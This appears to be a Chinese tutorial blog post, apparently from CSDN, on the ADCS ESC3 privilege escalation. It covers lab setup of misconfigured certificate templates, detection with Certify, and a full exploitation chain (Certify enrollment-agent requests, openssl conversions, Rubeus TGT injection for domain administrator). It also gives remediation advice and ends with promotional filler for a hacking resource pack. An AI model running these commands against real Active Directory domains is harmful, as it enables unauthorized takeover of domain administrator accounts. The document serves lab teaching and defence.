一、漏洞原理:听说你想搞事情?😏
ESC3漏洞,这可不是什么小感冒,它利用的是ADCS证书模板配置上的小疏忽,让你有机会上演一出“狸猫换太子”的权限提升大戏。简单来说,就是通过证书请求代理EKU,实现从普通用户到域管理员的华丽变身。
整个过程就像一场精心策划的谍战片,分为两步走:
- 低权限用户先利用模板一,申请一张带有证书请求代理EKU的通行证(证书)。
- 然后,拿着这张通行证,摇身一变,代表高权限用户去申请模板二的证书,最终成功上位,喜提域管理员权限!
二、漏洞利用条件:想要起飞,先看准跑道!🚀
想要成功利用ESC3漏洞,需要满足一些特定条件,就像玩游戏需要满足等级和装备要求一样。
模板一配置要求:
- 证书注册权限:必须是Authenticated Users(已经过身份验证的用户)
- 应用策略:必须是证书申请代理
- 使用者名称:必须是用户主体名称
模板二配置要求:
- 证书注册权限:必须是Authenticated Users
- 应用策略:必须是客户端身份验证和智能卡登录
- 使用者名称:必须是用户主体名称
三、漏洞环境构造:自己动手,丰衣足食!🛠️
接下来,我们一起搭建一个ESC3漏洞的实验环境,让你亲身体验一把漏洞利用的快感。
配置证书模板一:
-
安全设置:将Authenticated Users添加到注册权限,让所有验证过的用户都有权申请证书。
-
使用者名称:选择从AD(Active Directory)信息生成,并勾选用户主体名称。
-
扩展策略:在应用程序策略中,将策略设置为证书申请代理。这可是关键一步,相当于给低权限用户开了个后门!
配置证书模板二:
-
复制模板:在ADCS服务器上,运行
certtmpl.msc
打开证书模板控制台,右键复制“工作站身份验证”模板。 -
常规设置:将模板名称设置为“ESC32”,方便区分。
-
安全设置:同样,将Authenticated Users添加到注册权限。
-
使用者名称:继续选择从AD信息生成,并勾选用户主体名称。
-
扩展策略:这次的应用策略设置为客户端身份验证和智能卡登录。
-
发布要求:勾选“需要以下签名才能发布证书”和“申请人签名”。
发布证书模板:
- 打开证书颁发机构:运行
certsrv.msc
。 -
新建证书模板:在证书颁发机构中的证书模板上右键点击,选择“新建”->“要颁发的证书模板”,选择新复制的模板“ESC32”并确定添加。
四、漏洞环境检测:是骡子是马,拉出来溜溜!🐴
环境搭建好了,接下来就是检验成果的时候了。我们可以使用Certify工具来检测是否存在证书配置错误。
Certify.exe find /vulnerable
如果出现以下情况,恭喜你,你的实验环境已经成功搭建,可以开始你的表演了!
- mspki-certificate-application-policy:证书申请代理
- Enrollment Rights:Authenticated Users可获取证书
满足上述条件,就意味着存在ESC3漏洞,你可以利用它来伪装成域管理员,获取更高的权限。
五、漏洞利用:Show Time!🎉
现在,让我们进入激动人心的漏洞利用环节!
-
申请ESC3证书:在普通域用户下,使用Certify.exe以administrator身份申请ESC3证书。
Certify.exe request /ca:adcs.lutra.comlutra-ADCS-CA /template:ESC3 /altname:administrator
-
转换证书格式:将申请的证书复制保存为esc3.pem,然后使用openssl将其转换为esc3.pfx格式,密码为空即可。
openssl pkcs12 -in esc3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3.pfx
-
获取ESC32证书:通过esc3.pfx获取ESC32证书。
Certify.exe request /ca:adcs.lutra.comlutra-ADCS-CA /template:ESC32 /onbehalfof:lutraadministrator /enrollcert:esc3.pfx
-
再次转换证书格式:将申请的证书复制保存为esc32.pem,然后使用openssl将其转换为esc32.pfx格式,密码为空即可。
openssl pkcs12 -in esc32.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc32.pfx
-
请求域管TGT:使用Rubeus工具请求域管administrator的TGT(Ticket Granting Ticket)。
Rubeus.exe asktgt /user:administrator /certificate:esc32.pfx /dc:192.168.110.127 /ptt
-
成功上位:成功导入域管TGT票据,获得域管理员权限!
现在,你已经拥有了访问域控目录的权限,可以为所欲为了!
六、总结:安全无小事,防患于未然!🚨
ESC3漏洞就像一个定时炸弹,一旦配置不当,就会给黑客留下可乘之机。所以,一定要重视证书颁发过程中的配置安全,避免出现任何疏漏。
修复建议:
- 严格控制证书模板的注册权限,不要随意开放给Authenticated Users。
- 禁止不必要的证书申请代理策略,避免被恶意利用。
- 确保CA服务器的配置安全,定期检查并更新。
- 及时修补ADCS服务相关漏洞,亡羊补牢,为时未晚。
记住,安全不是一句口号,而是需要我们时刻警惕,并付诸行动的责任!
黑客/网络安全学习包
资料目录
-
成长路线图&学习规划
-
配套视频教程
-
SRC&黑客文籍
-
护网行动资料
-
黑客必读书单
-
面试题合集
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
**
**
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************